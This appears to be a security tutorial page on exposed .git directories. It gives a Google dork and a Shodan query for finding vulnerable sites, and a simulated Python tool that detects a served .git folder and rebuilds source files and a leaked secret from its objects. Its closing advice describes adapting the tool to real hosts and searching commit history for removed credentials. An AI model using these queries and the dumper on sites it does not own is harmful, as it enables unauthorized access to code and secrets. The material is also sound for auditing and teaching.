Insecure Source Code Management refers to the inadequate protection and handling of source code repositories, leading to vulnerabilities and potential unauthorized access to sensitive code.
Standard practice is that the .git directory must never be reachable under the web root, but developers still deploy by copying or cloning the whole project, .git included, into a directory the web server serves, and that is when the leak happens. Once the directory is served, anyone who can fetch .git/HEAD can reconstruct the repository, including its full history, deleted files and any credentials that were ever committed, whether or not directory listing is enabled.
By searching for the Google dork intitle:"Index of /.git", any user can find websites whose Git repository is publicly exposed. Note that this dork only matches servers that also have directory listing (autoindex) enabled; a .git directory served without a listing is just as exposed but does not show up in these results.
Shodan indexes Internet-facing hosts and the banners and pages their services return. The query http.title:"Index of /" http.html:".git" returns hosts whose web root is served as a directory listing and whose listing contains a .git entry.
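The following Python is an added example, not code from the original page: it shows the probe a practitioner uses instead of relying on directory listings (fetch /.git/HEAD and check that it looks like a ref), and then what "downloading the source" actually means once the directory is reachable, namely walking HEAD to a commit, its tree and its blobs through the loose-object layout under .git/objects. No real host is contacted: the site dict stands in for an HTTP server, and every path, commit and the leaked .env file in it are constructed here for the demo.

```python
"""Added example (not from the original page): detect a served .git directory
and walk its loose objects back to source files. The "site" dict is a
constructed stand-in for an HTTP server; nothing here touches the network."""
import hashlib
import re
import zlib


def git_object(kind: str, data: bytes):
    """Encode data as a loose git object: '<type> <len>\\0<payload>', zlib-
    compressed on disk and named by the SHA-1 of the uncompressed form."""
    raw = kind.encode() + b" " + str(len(data)).encode() + b"\x00" + data
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_exposed_site() -> dict:
    """Constructed web root that was deployed with its .git directory:
    one commit tracking a single .env file that holds a secret."""
    blob_sha, blob = git_object("blob", b"DB_PASSWORD=hunter2\n")
    tree_sha, tree = git_object("tree", b"100644 .env\x00" + bytes.fromhex(blob_sha))
    commit_sha, commit = git_object(
        "commit",
        (f"tree {tree_sha}\nauthor dev <dev@example.invalid> 0 +0000\n"
         f"committer dev <dev@example.invalid> 0 +0000\n\nadd config\n").encode(),
    )
    site = {
        "/index.html": b"<html>hello</html>",
        "/.git/HEAD": b"ref: refs/heads/main\n",
        "/.git/refs/heads/main": (commit_sha + "\n").encode(),
    }
    for sha, obj in ((blob_sha, blob), (tree_sha, tree), (commit_sha, commit)):
        site[f"/.git/objects/{sha[:2]}/{sha[2:]}"] = obj
    return site


def http_get(site: dict, path: str):
    """Simulated GET: the response body, or None for a 404."""
    return site.get(path)


# HEAD is either a symbolic ref or, when detached, a bare 40-hex commit id.
HEAD_RE = re.compile(rb"^(ref: refs/\S+|[0-9a-f]{40})\s*$")


def is_git_exposed(site: dict) -> bool:
    """Probe /.git/HEAD directly. This finds hosts that serve the directory
    without an autoindex page (which the 'Index of /.git' dork misses) and
    rejects soft-404 pages that return HTML with status 200."""
    body = http_get(site, "/.git/HEAD")
    return body is not None and HEAD_RE.match(body) is not None


def read_object(site: dict, sha: str):
    """Fetch one loose object, verify its hash, return (type, payload)."""
    comp = http_get(site, f"/.git/objects/{sha[:2]}/{sha[2:]}")
    if comp is None:
        # Objects may instead sit in packfiles under /.git/objects/pack/.
        raise FileNotFoundError(sha)
    raw = zlib.decompress(comp)
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError(f"object {sha} failed hash check")
    header, data = raw.split(b"\x00", 1)
    return header.split(b" ")[0].decode(), data


def parse_tree(data: bytes):
    """Tree entries are '<mode> <name>\\0<20 raw SHA-1 bytes>' back to back."""
    entries, i = [], 0
    while i < len(data):
        sp = data.index(b" ", i)
        nul = data.index(b"\x00", sp)
        entries.append((data[i:sp].decode(), data[sp + 1:nul].decode(),
                        data[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def head_commit(site: dict) -> str:
    """Resolve HEAD (symbolic ref or detached SHA) to a commit id."""
    head = http_get(site, "/.git/HEAD").strip()
    if head.startswith(b"ref: "):
        return http_get(site, "/.git/" + head[5:].decode()).strip().decode()
    return head.decode()


def dump_source(site: dict, tree_sha=None, prefix="") -> dict:
    """Walk commit -> tree -> blobs and return {path: contents} for HEAD."""
    if tree_sha is None:
        kind, commit = read_object(site, head_commit(site))
        assert kind == "commit"
        tree_sha = commit.split(b"\n", 1)[0].split(b" ")[1].decode()
    files = {}
    for mode, name, sha in parse_tree(read_object(site, tree_sha)[1]):
        if mode == "40000":  # subdirectory: recurse into the nested tree
            files.update(dump_source(site, sha, prefix + name + "/"))
        else:
            files[prefix + name] = read_object(site, sha)[1]
    return files


if __name__ == "__main__":
    target = build_exposed_site()
    print("exposed:", is_git_exposed(target))
    for path, content in dump_source(target).items():
        print(path, content.decode().rstrip())
```

Against a real host the same logic applies with http_get replaced by an HTTP client: probe .git/HEAD first, then follow refs and objects. Two things the toy repo glosses over matter in practice: objects that have been packed live in .git/objects/pack/ and need the pack index, and the interesting material is usually in earlier commits (follow the "parent" lines of each commit), since a secret removed in the latest revision is still present in history.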
Downloading src code from a .git url